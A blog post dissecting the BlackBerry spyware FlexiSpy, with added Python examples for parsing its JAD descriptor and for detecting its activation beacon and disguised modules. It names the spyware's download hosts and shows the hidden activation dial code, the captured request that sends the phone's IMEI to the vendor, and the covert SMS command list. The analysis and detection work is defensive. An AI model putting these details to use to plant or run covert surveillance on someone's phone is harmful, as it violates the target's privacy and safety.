In keeping with the spirit of raising awareness, I’m pleased to present an in-depth look at the commercial spyware application known as FlexiSpy. Looking at its creation date, the FlexiSpy domain started its online life in April of 2006 (corrected from July of 2008), more than three years ago [thanks Spyphoneguy for pointing that out]. The site sells several products meant for mobile phones; most of them can be classified as surveillance tools. Once purchased, their product suite needs to be installed on a “target’s” phone, the target being the person on whom surveillance is conducted. Functionality includes remotely reading emails, SMS messages and call logs and, of course, remote listening. Depending on the product, this will set a buyer back about $200 – $300.
Once a buyer parts with his $300, he will receive a user manual that explains how the application can be installed on a target’s phone. I examined the version for the BlackBerry. When going through the user manual, one of the first things that jumped out at me was this: explicit instructions to set the Default Permissions of the BlackBerry handheld to Allow All. This means that not just FlexiSpy, but every single application the target installs on his phone after this, can gain full control (within the scope of the programming interface, or API) over his handheld. Obviously user protection is not a high priority in this case.

At this point, I haven’t installed the app yet, so I begin to do so. Using the phone’s built-in browser, I am asked to visit the site http://djp.cc. I need to enter my activation key there, and then I am presented with a download dialog. This download dialog is simply a JAD file, the contents of which are listed below:
Manifest-Version: 1.0
MIDlet-Version: 3.02.04
MIDlet-Jar-Size: 232073
RIM-COD-URL-2: net_rim_app_console_pro-2.cod
MicroEdition-Configuration: CLDC-1.1
MIDlet-Jar-URL: net_rim_app_console_pro.jar
RIM-COD-Module-Dependencies: net_rim_cldc,net_rim_bbapi_mailv2,net_rim_os,net_rim_bbapi_phone,net_rim_locationapi
RIM-COD-SHA1-2: 49 d9 a2 9c 2e 55 c2 fc da b4 2d 96 01 67 ef 7a 89 26 25 ac
RIM-COD-URL-1: net_rim_app_console_pro-1.cod
RIM-COD-SHA1-1: ab 26 1a 63 7c e9 e4 83 bc 04 2b 69 22 c7 54 5b 73 02 13 ce
RIM-COD-Size-2: 31304
RIM-COD-Size-1: 87268
RIM-COD-Module-Name: net_rim_app_console_pro
MIDlet-Name: net_rim_app_console_pro
RIM-COD-Size: 78756
RIM-COD-Creation-Time: 1246442605
RIM-COD-URL: net_rim_app_console_pro.cod
RIM-Library-Flags: 3
RIM-COD-SHA1: c9 33 b8 05 92 d8 08 e0 03 a6 21 e3 56 e7 70 0a f8 42 63 b5
MicroEdition-Profile: MIDP-2.0
MIDlet-Vendor: <unknown>
This tells a BlackBerry where to go to get the actual binary, or COD file. In this case it’s http://djp.cc/net_rim_app_console_pro.cod and http://djp.cc/net_rim_app_console_pro-1.cod. Generally, if a COD file exceeds size limitations or consists of several pre-compiled external libraries, more than one file will need to be downloaded. This is interesting because the first thing I did after installing it was look for it in my Applications screen. It turns out that FlexiSpy is never hidden on your BlackBerry. It remains in plain sight, but with an obscure name that looks very similar to a RIM native library. The application is also tagged as a library.
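To make the descriptor’s structure concrete, here is an added Python example (my own code, not FlexiSpy’s or RIM’s) that parses the JAD above, folds the wrapped RIM-COD-Module-Dependencies line, resolves every RIM-COD-URL against the http://djp.cc/ base the post names, and compares a downloaded COD’s size and SHA-1 against what the descriptor advertises. The function names are mine.

```python
"""Parse a BlackBerry JAD descriptor and enumerate the COD modules it pulls in.

Added example, not FlexiSpy's or RIM's code. JAD_TEXT is the descriptor
quoted in the post; the base URL http://djp.cc/ is the host the post names.
"""
import hashlib
from urllib.parse import urljoin

# Descriptor as quoted in the post. A JAD is "Key: value" lines; a line with
# no colon is treated here as a wrapped continuation of the previous value.
JAD_TEXT = """\
Manifest-Version: 1.0
MIDlet-Version: 3.02.04
MIDlet-Jar-Size: 232073
RIM-COD-URL-2: net_rim_app_console_pro-2.cod
MicroEdition-Configuration: CLDC-1.1
MIDlet-Jar-URL: net_rim_app_console_pro.jar
RIM-COD-Module-Dependencies: net_rim_cldc,net_rim_bbapi_mailv2,net_rim_os,net_rim_bbapi_phone,
net_rim_locationapi
RIM-COD-SHA1-2: 49 d9 a2 9c 2e 55 c2 fc da b4 2d 96 01 67 ef 7a 89 26 25 ac
RIM-COD-URL-1: net_rim_app_console_pro-1.cod
RIM-COD-SHA1-1: ab 26 1a 63 7c e9 e4 83 bc 04 2b 69 22 c7 54 5b 73 02 13 ce
RIM-COD-Size-2: 31304
RIM-COD-Size-1: 87268
RIM-COD-Module-Name: net_rim_app_console_pro
MIDlet-Name: net_rim_app_console_pro
RIM-COD-Size: 78756
RIM-COD-Creation-Time: 1246442605
RIM-COD-URL: net_rim_app_console_pro.cod
RIM-Library-Flags: 3
RIM-COD-SHA1: c9 33 b8 05 92 d8 08 e0 03 a6 21 e3 56 e7 70 0a f8 42 63 b5
MicroEdition-Profile: MIDP-2.0
MIDlet-Vendor: <unknown>
"""


def parse_jad(text):
    """Return the descriptor as a dict, folding wrapped continuation lines."""
    attrs = {}
    last_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if ":" in line:
            key, _, value = line.partition(":")
            last_key = key.strip()
            attrs[last_key] = value.strip()
        elif last_key is not None:
            attrs[last_key] += line  # no "Key:" prefix: continuation of last value
    return attrs


def dependencies(attrs):
    """RIM modules the COD links against (the handset must already have them)."""
    raw = attrs.get("RIM-COD-Module-Dependencies", "")
    return [d for d in raw.split(",") if d]


def cod_modules(attrs, base_url):
    """Every COD the JAD references: absolute URL, expected SHA-1 and size.

    RIM-COD-URL names the main COD; RIM-COD-URL-1, -2, ... name the sibling
    CODs a large application is split into. Each has matching SHA1/Size keys.
    """
    modules = []
    for key, value in attrs.items():
        if key == "RIM-COD-URL" or key.startswith("RIM-COD-URL-"):
            suffix = key[len("RIM-COD-URL"):]  # "" for the main COD, else "-N"
            sha1 = attrs.get("RIM-COD-SHA1" + suffix, "").replace(" ", "").lower()
            size = int(attrs.get("RIM-COD-Size" + suffix, "0"))
            modules.append({"url": urljoin(base_url, value), "sha1": sha1, "size": size})
    return sorted(modules, key=lambda m: m["url"])


def cod_matches(data, expected):
    """True if downloaded COD bytes have the size and SHA-1 the JAD advertises."""
    return len(data) == expected["size"] and hashlib.sha1(data).hexdigest() == expected["sha1"]


if __name__ == "__main__":
    jad = parse_jad(JAD_TEXT)
    print("dependencies:", ", ".join(dependencies(jad)))
    for mod in cod_modules(jad, "http://djp.cc/"):
        print(f'{mod["url"]}  size={mod["size"]}  sha1={mod["sha1"]}')
```

Running it lists three CODs, not two: the descriptor also names net_rim_app_console_pro-2.cod. The SHA-1 and size per module are what you would record as indicators for the build you captured.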

[Image: How FlexiSpy looks when installed]

[Image: FlexiSpy is installed as a library]
So there it is: if you want to look for the latest version of FlexiSpy on your BlackBerry, go to Options->Advanced Options->Applications and look for “net_rim_app_console_pro”. One very interesting thing is that if something is marked as a Library, in theory at least, you should be able to access some of the classes and methods within. Curious, I did a “strings” on each of the COD files. True enough, there was a list of package names, classes and methods visible – at least their names. Since I’ve given out the URL, I’ll leave this exercise up to the reader. I will explore how this can be done and whether other applications can indeed make use of FlexiSpy’s libraries.
Behavior
FlexiSpy requires activation before it can begin to spy on a target. To do this, a user has to dial the number *#900900900 and then a hidden screen is activated. On this screen, a user is prompted to enter the activation code. Never one to leave home without my Wireshark, I sniffed the traffic that went through during the activation process. Here is the information that went across the wire:
POST /t4l-mcli/cmd/productactivate?mode=0&ver=0302&pid=FSP_BB_V4.2&actcode=[Activation Code]
&hash=[IMEI]&phmodel=8300(4.5.0.44) HTTP/1.1
This request is made to a server under the second-level domain “aabackup.info”. It resolves to the same IP address as the host djp.cc listed above. As you can see, the phone’s IMEI is being sent back to FlexiSpy HQ. Also visible is the Activation Code. What is returned is a hash value which I haven’t looked into very closely yet. Presumably the phone computes the same hash and waits for a match. Once the correct hash is received the app is activated.
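As an added example of turning this observation into a detection (my code, not the post’s or FlexiSpy’s), the Python below runs two simple rules over constructed proxy log lines: it parses each request target and flags any request to a productactivate-style path whose hash parameter is a 15-digit IMEI, noting whether the host belongs to one of the two domains this post names, and separately flags COD downloads from those domains. The log format is an assumption, and the IMEI and actcode values are placeholders. The first rule matches on request shape rather than host, so it still fires if the operator moves to a domain not on the list.

```python
"""Flag FlexiSpy-style activation beacons and COD fetches in an HTTP proxy log.

Added example, not the post's or FlexiSpy's code. The log lines are
constructed ("<host> <METHOD> <path?query>" is an assumed format); the path
and query keys mirror the request the post captured, and aabackup.info and
djp.cc are the two domains the post names. IMEI and actcode are placeholders.
"""
import re
from urllib.parse import parse_qs, urlsplit

KNOWN_DOMAINS = {"aabackup.info", "djp.cc"}
IMEI_RE = re.compile(r"^\d{15}$")  # an IMEI is 15 decimal digits

# constructed log: a benign line, the activation POST, a benign line, a COD
# fetch, and the same activation shape sent to a host not on our list
PROXY_LOG = """\
www.example.com GET /index.html
www.aabackup.info POST /t4l-mcli/cmd/productactivate?mode=0&ver=0302&pid=FSP_BB_V4.2&actcode=PLACEHOLDERCODE&hash=123456789012345&phmodel=8300(4.5.0.44)
mail.example.net GET /inbox?page=2
djp.cc GET /net_rim_app_console_pro.cod
cdn.example.org POST /api/productactivate?hash=999999999999999&pid=TEST
"""


def parse_request(line):
    """Split one log line into host, method, path and a flat query dict."""
    host, method, target = line.split(" ", 2)
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"host": host.lower(), "method": method, "path": parts.path, "query": query}


def mask(value, keep=4):
    """Keep only the tail of a device identifier when it goes into an alert."""
    return "*" * max(len(value) - keep, 0) + value[-keep:]


def registered_domain(host):
    """Naive eTLD+1: the last two labels (enough for the hosts in this example)."""
    return ".".join(host.split(".")[-2:])


def triage(log_text):
    """Return one finding dict per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        req = parse_request(line)
        known = registered_domain(req["host"]) in KNOWN_DOMAINS
        q = req["query"]
        # Rule 1: activation call-home, matched on request shape (a
        # /productactivate path carrying a 15-digit "hash" = IMEI), so it
        # fires regardless of which domain the request goes to.
        if req["path"].endswith("/productactivate") and IMEI_RE.match(q.get("hash", "")):
            findings.append({"rule": "activation-beacon", "host": req["host"],
                             "known_domain": known, "imei": mask(q["hash"]),
                             "pid": q.get("pid")})
        # Rule 2: a COD module pulled from a domain tied to the product.
        elif known and req["path"].endswith(".cod"):
            findings.append({"rule": "cod-download", "host": req["host"],
                             "known_domain": True,
                             "module": req["path"].rsplit("/", 1)[-1]})
    return findings


if __name__ == "__main__":
    for finding in triage(PROXY_LOG):
        print(finding)
```

The IMEI is masked before it reaches the alert, since the identifier is exactly the thing the spyware is exfiltrating and an alert pipeline should not copy it into yet another store.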
From this point on, it’s a case of configuring the application to intercept SMS messages, email messages, call logs, etc. The application has a command channel over SMS. Thus, you have a list of about 8 commands which do the following:
- Start Capture – Begin capturing events like email, sms, location, etc
- Stop Capture – Stop an already started capture
- Send Immediate – Send all collected events to the central logging host
- Send Diagnostics – Send diagnostic info
- Start SIM Monitor – Watch for any attempt at changing the SIM
- Stop SIM Monitor – Stop
- Start Mic Monitor – Wait for calls from a trigger number
- Stop Mic Monitor – Stop
The funny thing is that the command channel SMS messages cannot be deleted, so the manual advises a user to select short phrases like “Good morning” or some such to begin capturing information. The phrases should be chosen so as not to arouse the target’s suspicion.
Detection
FlexiSpy relies very heavily on Listeners. Even to bring up its secret screen, it adds a PhoneListener that waits for a specific number to be dialed. This ensures that no running application shows up on the phone. It uses these built-in features of the BlackBerry to remain cloaked. It sits in plain sight in your applications directory, and FlexiSpy can choose to change its name whenever they release a new version. I am incorporating the detection of both FlexiSpy and Mobile-Spy in my Kisses app. I have a few ideas on how I can write a one-time detector for FlexiSpy and Mobile-Spy. The theories are on the drawing board at the moment. I have to find a way to bring it into the code.
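To illustrate the kind of one-time check such a detector might run, here is an added Python example (mine, not the Kisses app and not FlexiSpy’s code) that triages a constructed module inventory. It matches module names and COD hashes against the values from the JAD quoted above and, to survive a rename, also flags libraries that wear the net_rim_ naming prefix without RIM’s vendor string (the captured JAD declares its vendor as <unknown>). That a device exposes name, vendor, library flag and COD hash in this form, and the exact RIM vendor string, are assumptions of the example.

```python
"""Triage an installed-module inventory for modules posing as RIM libraries.

Added example, not the Kisses app and not FlexiSpy's code. INVENTORY is
constructed. The module name and the three COD SHA-1s are the values from the
JAD quoted earlier in the post; "<unknown>" is the MIDlet-Vendor that JAD
declares. That a device exposes name, vendor, library flag and COD hash in
this form is an assumption of the example.
"""
KNOWN_SPYWARE_NAMES = {"net_rim_app_console_pro"}
KNOWN_SPYWARE_COD_SHA1 = {
    "c933b80592d808e003a621e356e7700af84263b5",  # net_rim_app_console_pro.cod
    "ab261a637ce9e483bc042b6922c7545b730213ce",  # net_rim_app_console_pro-1.cod
    "49d9a29c2e55c2fcdab42d960167ef7a892625ac",  # net_rim_app_console_pro-2.cod
}
RIM_PREFIX = "net_rim_"
RIM_VENDOR = "Research In Motion Limited"  # assumed vendor string on genuine modules

# constructed inventory: a genuine RIM module, two of the FlexiSpy CODs, a
# normal third-party app, and a renamed build we hold no hash for
INVENTORY = [
    {"name": "net_rim_bb_browser", "vendor": RIM_VENDOR, "library": True, "sha1": "0" * 40},
    {"name": "net_rim_app_console_pro", "vendor": "<unknown>", "library": True,
     "sha1": "c933b80592d808e003a621e356e7700af84263b5"},
    {"name": "net_rim_app_console_pro-1", "vendor": "<unknown>", "library": True,
     "sha1": "ab261a637ce9e483bc042b6922c7545b730213ce"},
    {"name": "com_example_solitaire", "vendor": "Example Games", "library": False, "sha1": "1" * 40},
    {"name": "net_rim_sys_helper", "vendor": "<unknown>", "library": True, "sha1": "2" * 40},
]


def triage_module(mod):
    """Return the reasons a module is suspicious (an empty list means clean)."""
    reasons = []
    if mod["sha1"] in KNOWN_SPYWARE_COD_SHA1:
        reasons.append("hash matches a known FlexiSpy COD")
    base_name = mod["name"].rsplit("-", 1)[0]  # sibling CODs carry a -N suffix
    if base_name in KNOWN_SPYWARE_NAMES:
        reasons.append("known FlexiSpy module name")
    # Rename-resistant heuristic: a library wearing RIM's naming prefix but
    # not RIM's vendor string. A genuine RIM module should never trip this.
    if mod["library"] and mod["name"].startswith(RIM_PREFIX) and mod["vendor"] != RIM_VENDOR:
        reasons.append("RIM-style library name without RIM vendor")
    return reasons


def triage_inventory(inventory):
    """Map each suspicious module name to the list of reasons it was flagged."""
    hits = {}
    for mod in inventory:
        reasons = triage_module(mod)
        if reasons:
            hits[mod["name"]] = reasons
    return hits


if __name__ == "__main__":
    for name, reasons in triage_inventory(INVENTORY).items():
        print(name, "->", "; ".join(reasons))
```

The hash and name rules catch the build captured here; only the vendor heuristic catches the renamed net_rim_sys_helper entry, which is the case the paragraph above is worried about.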
I expect to do a much more detailed write up on both FlexiSpy and Mobile-Spy and a much needed paper on what BlackBerry users can do to protect themselves.
Acknowledgments
Special thanks go out to Spyphoneguy for all his help!
Comments for “The Anatomy Of A Spyware Application – Part 1”